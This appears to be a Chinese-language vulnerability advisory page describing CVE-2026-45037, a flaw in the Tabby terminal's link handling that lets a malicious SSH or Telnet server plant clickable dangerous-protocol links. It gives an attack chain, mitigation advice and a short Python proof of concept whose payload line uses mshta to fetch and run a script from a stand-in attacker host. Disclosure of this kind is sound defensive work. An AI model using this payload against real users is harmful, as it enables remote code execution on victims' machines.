IPBUF安全漏洞报告
English
CVE-2026-45037 CVSS 7.1 高危

CVE-2026-45037 Tabby终端链接器协议处理漏洞

披露日期: 2026-05-15

漏洞信息

漏洞编号
CVE-2026-45037
漏洞类型
协议处理漏洞
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Tabby (formerly Terminus)

相关标签

协议处理漏洞TabbyRCE终端模拟器CVE-2026-45037

漏洞概述

Tabby(原Terminus)终端模拟器在1.0.232版本之前存在安全漏洞。其终端链接器功能在将检测到的URI传递给操作系统协议处理器之前,未对协议方案进行有效验证。这允许恶意SSH或Telnet服务器发送包含危险协议URI的恶意终端输出,Tabby将其渲染为可点击链接,一旦受害者点击,即可在受害者机器上触发任意操作系统协议处理器,导致潜在的安全风险。

技术细节

该漏洞源于Tabby的终端链接器组件缺乏对URI协议方案的安全校验机制。当Tabby连接到受攻击者控制的SSH或Telnet服务器时,攻击者可以在服务器的终端输出中插入特定格式的URI字符串(例如`mshta:`、`javascript:`或其他自定义危险协议)。Tabby会自动识别这些字符串并将其渲染为可点击的超链接。由于程序未对协议头进行过滤,当用户无意中点击这些链接时,Tabby会直接调用操作系统的默认协议处理程序来执行该URI。这种行为可能导致任意命令执行、恶意文件下载或应用程序启动,攻击者利用了系统对协议注册的信任机制实现攻击。

攻击链分析

STEP 1
步骤1
攻击者搭建恶意的SSH或Telnet服务器,配置服务器响应以包含特定的恶意URI。
STEP 2
步骤2
诱导受害者使用存在漏洞的Tabby版本(< 1.0.232)连接到该恶意服务器。
STEP 3
步骤3
恶意服务器向Tabby发送终端输出,其中包含未经验证的危险协议URI(如mshta等)。
STEP 4
步骤4
Tabby的终端链接器识别出该URI并将其渲染为可点击的超链接显示在终端界面。
STEP 5
步骤5
受害者被诱导点击该链接,Tabby直接调用操作系统协议处理器执行该URI。
STEP 6
步骤6
操作系统执行恶意命令或脚本,导致攻击者在受害者机器上获得执行权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Simulation for CVE-2026-45037 # This script simulates a malicious SSH server sending a crafted payload. # It demonstrates the payload generation, not the actual server implementation. def generate_malicious_output(): # The malicious URI designed to trigger the OS protocol handler # Example: Using mshta to execute a remote script (common technique) malicious_uri = "mshta:http://attacker.example.com/payload.hta" # Simulated terminal output that might appear in a real SSH session banner = "Welcome to the Secure Shell Server." trick_message = "Click here to verify your session: " + malicious_uri return banner + "\n" + trick_message if __name__ == "__main__": print("[*] Generating malicious terminal output for CVE-2026-45037...") print(generate_malicious_output())

影响范围

Tabby < 1.0.232

防御指南

临时缓解措施
建议用户立即将Tabby软件更新到最新版本以修复此漏洞。在无法立即更新的情况下,用户应提高警惕,不要轻易点击终端窗口中显示的超链接,特别是那些连接到未知或不受信任SSH服务器时产生的链接。此外,可以在操作系统中修改注册表或组策略,限制高风险协议(如mshta、javascript)的自动处理行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表